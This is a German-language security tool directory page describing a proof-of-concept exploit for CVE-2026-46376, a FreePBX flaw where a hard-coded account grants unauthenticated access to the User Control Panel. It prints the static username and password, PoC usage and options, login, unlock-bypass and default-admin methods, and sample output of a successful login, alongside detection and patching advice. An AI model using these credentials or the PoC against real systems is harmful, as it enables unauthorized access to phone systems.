Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-46376 — CVE-2026-46376 - FreePBX Unauthenticated UCP Access via Hard-Coded Credentials | Kitploit
Tools/GitHubGitHub/portbuster1337/cve-2026-46376
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationPapers & ResearchLearning & Education
GitHubportbuster1337/cve-2026-46376

CVE-2026-46376

CVE-2026-46376 - FreePBX Unauthenticated UCP Access via Hard-Coded Credentials

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-46376 — Unbefugter UCP-Zugriff auf FreePBX über hartcodierte Anmeldedaten

Eine kritische Schwachstelle im Benutzerverwaltungsmodul (userman) von FreePBX ermöglicht es nicht authentifizierten Angreifern, auf das User Control Panel (UCP) zuzugreifen, indem sie hartcodierte Anmeldedaten verwenden, die während des Einrichtungsprozesses der generischen UCP-Vorlage eingebettet werden.

CVSS v4.0: 9.1 (Kritisch) | CWE-798: Verwendung hartcodierter Anmeldedaten

Offengelegt: 15. Mai 2026 | Melder: s0nnyWT

Details

Wenn ein Administrator die optionale Funktion zur Einrichtung der generischen UCP-Vorlage (eingeführt im Jahr 2021) verwendet, wird ein Systembenutzer FreePBXUCPTemplateCreator mit einem hartcodierten, statischen Passwort erstellt. Wenn der Administrator dieses Passwort nach der Einrichtung nie ändert, kann sich jeder nicht authentifizierte Benutzer im Netzwerk mit diesen Anmeldedaten im UCP anmelden.

FeldWert
UsernameFreePBXUCPTemplateCreator
Password1a2b3c@fd48jshs03123ld
SourceUserman.class.php — password passed through md5()
AngriffsvektorNetzwerk
KomplexitätNiedrig
Authentifizierung erforderlichKeine
BenutzerinteraktionKeine
VoraussetzungAdmin muss die Einrichtung der generischen UCP-Vorlage ausgeführt haben

Hinweis: Der Benutzer FreePBXUCPTemplateCreator wird nur erstellt, wenn ein Administrator explizit die Funktion zur Einrichtung der generischen UCP-Vorlage ausführt. Systeme, bei denen diese Einrichtung nie durchgeführt wurde, sind über diese CVE nicht ausnutzbar, selbst wenn eine betroffene Version läuft.

Betroffene Versionen

Der Fix randomisiert das Passwort mittels bin2hex(random_bytes(24)) während der Installation/Aktualisierung, und bestehende Vorlagenersteller erhalten bei der Aktualisierung ihr Passwort neu generiert.

PoC-Nutzung

root@kitploit:~
pip3 install requests
python3 poc.py <target_url>

Optionen

root@kitploit:~
positional arguments:
  target              Target URL (e.g. http://192.168.1.100)

optional arguments:
  -h, --help          show this help message and exit
  --no-check          Skip version pre-flight check
  --timeout TIMEOUT   Request timeout in seconds (default: 15)
  --method {creds,unlock,admin,all}
                      Which exploit method to run (default: all)
  -y, --yes           Auto-continue even if version is out of range

Methoden

  1. creds — Am UCP anmelden über POST /ucp/ajax.php mit module=User&command=login unter Verwendung der hartcodierten Anmeldedaten
  2. unlock — Umgehung des Entsperr-Schlüssels versuchen über die Abfrageparameter ?unlockkey=&templateid=
  3. admin — Häufige Standard-Admin-Anmeldedaten auf dem ACP versuchen

Beispiel

root@kitploit:~
$ python3 poc.py http://192.168.1.100

============================================
  CVE-2026-46376 PoC - FreePBX UCP Access
  Target: http://192.168.1.100
============================================

[+] Target is reachable (HTTP 200)
[+] FreePBX version: 16.0.30
[+] Version 16.0.30 is in the affected range
[+] UCP interface is accessible

============================================
  Exploitation
============================================

============================================
  Method 1: Hard-Coded UCP Credentials
============================================
    Username: FreePBXUCPTemplateCreator
    Password: 1a2b3c@fd48jshs03123ld
[+] Got CSRF token: a749bea059fa66bd32087a8481a4d07b
[+] SUCCESS! Logged in as FreePBXUCPTemplateCreator

============================================
  Summary
============================================
Target is VULNERABLE

Erkennung

Um zu prüfen, ob ein System ausnutzbar ist, sendet der PoC eine Anmeldeanfrage an POST /ucp/ajax.php mit module=User&command=login und den Anmeldedaten. Eine {"status":true}-Antwort zeigt an, dass der Vorlagenersteller-Benutzer existiert und das Passwort noch der Standardwert ist.

Eine {"status":false,"message":"Invalid Login Credentials"}-Antwort bedeutet entweder:

  • Der Benutzer existiert nicht (die Vorlageneinrichtung wurde nie ausgeführt), oder
  • Das Passwort wurde bereits rotiert

Gegenmaßnahmen

  • Aktualisieren Sie das userman-Modul auf 16.0.45 (FreePBX 16) oder 17.0.7 (FreePBX 17)
  • Überprüfen und rotieren Sie alle vorhandenen UCP-Vorlagenanmeldedaten – Patchen ändert NICHT rückwirkend bereits bereitgestellte Passwörter
  • Beschränken Sie den ACP/UCP-Zugriff auf vertrauenswürdige Netzwerke mit dem FreePBX-Firewall-Modul
  • Aktivieren Sie MFA oder SAML für zusätzliche Authentifizierungsebenen
  • Überwachen Sie aktive UCP-Sitzungen auf unbefugte Anmeldungen

Haftungsausschluss

Dieser PoC wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Die unbefugte Nutzung dieses Exploits gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Testgenehmigung haben, ist illegal. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Referenzen

  • GHSA-m55x-h47x-v3gx
  • NVD - CVE-2026-46376
  • FreePBX userman commit (eingeführt)
Tool herunterladen
Plattformuserman-ModulBetroffenGefixt
FreePBX 15—15.0.42+N/A
FreePBX 16userman≤ 16.0.4416.0.45
FreePBX 17userman≤ 17.0.617.0.7